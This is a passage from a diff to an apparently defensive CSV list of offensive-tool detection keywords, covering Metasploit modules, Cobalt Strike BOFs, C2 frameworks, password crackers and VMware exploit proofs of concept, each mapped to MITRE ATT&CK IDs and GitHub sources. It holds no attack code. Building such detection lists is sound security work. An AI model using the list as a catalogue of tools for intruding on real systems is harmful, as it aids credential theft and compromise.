tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/virajkulkarni14","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Viralmaniar*","offensive_tool_keyword","Github Username","github username hosting post exploitation tools and recon tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Viralmaniar","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*virusscan_bypass.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*virusscan_bypass.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*VirusTotalC2.*","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","5","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" "*Visual-Studio-BOF-template*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*VITE_STRIKER_API*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*VMSA-2023-0001.py*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" -"*vmware_view_planner*uploadlog_rce*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*vmware_view_planner*uploadlog_rce*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*vmware_vrni_rce_cve_2023_20887.rb*","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","3","219","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" -"*vmware_workspace_one_access_cve_*.rb","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb","1","1","N/A","N/A","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*vmware_workspace_one_access_cve_*.rb","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb","1","1","N/A","N/A","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*VMware-vRealize-Log-Insight.cert*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" -"*vmx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*vnc_password_osx.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*vnc_passwords.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*vmx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*vnc_password_osx.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vnc_passwords.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*vncdumpdll*","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*vncinject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*vncpcap2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*vncinject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vncpcap2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*vncpwdump.*","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*vnperistence.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*VPNPivot*","offensive_tool_keyword","VPNPivot","Sometime we do external penetration testing and when we compromise the remote target we would like to explore the internal network behind and getting such compromise like owning Active directory. accessing shared files. conducting MITM attacks ... etc","T1090 - T1095 - T1562 - T1201 - T1558","TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0x36/VPNPivot","1","1","N/A","N/A","3","256","52","2016-07-21T08:49:26Z","2015-08-26T18:44:42Z" "*vRealizeLogInsightRCE*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" -"*vssenum.x64.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*vssenum.x86.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*vtiger_crm_upload_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*vssenum.x64.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*vssenum.x86.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*vtiger_crm_upload_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*vulfocus/spring-core-rce-*","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","4","394","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" "*vulmon*Vulmap*","offensive_tool_keyword","Vulmap","Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also. they can be used for privilege escalation by pentesters/red teamers.","T1210.001 - T1190 - T1059 - T1213","TA0007 - TA0002 - TA0008 - TA0011","N/A","N/A","Vulnerability scanner","https://github.com/vulmon/Vulmap","1","1","N/A","N/A","9","888","196","2023-03-18T23:56:41Z","2018-09-07T15:49:36Z" -"*Vulnerabilities/RPCDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Vulnerabilities/RPCDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*vulnfactory.org/exploits/*.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*vulns/apache.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*vulns/iis.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*vulns/jrun.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*vulns/tomcat.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*vulnweb.com/FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulns/apache.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulns/iis.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulns/jrun.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulns/tomcat.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulnweb.com/FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*vu-ls/Crassus*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege 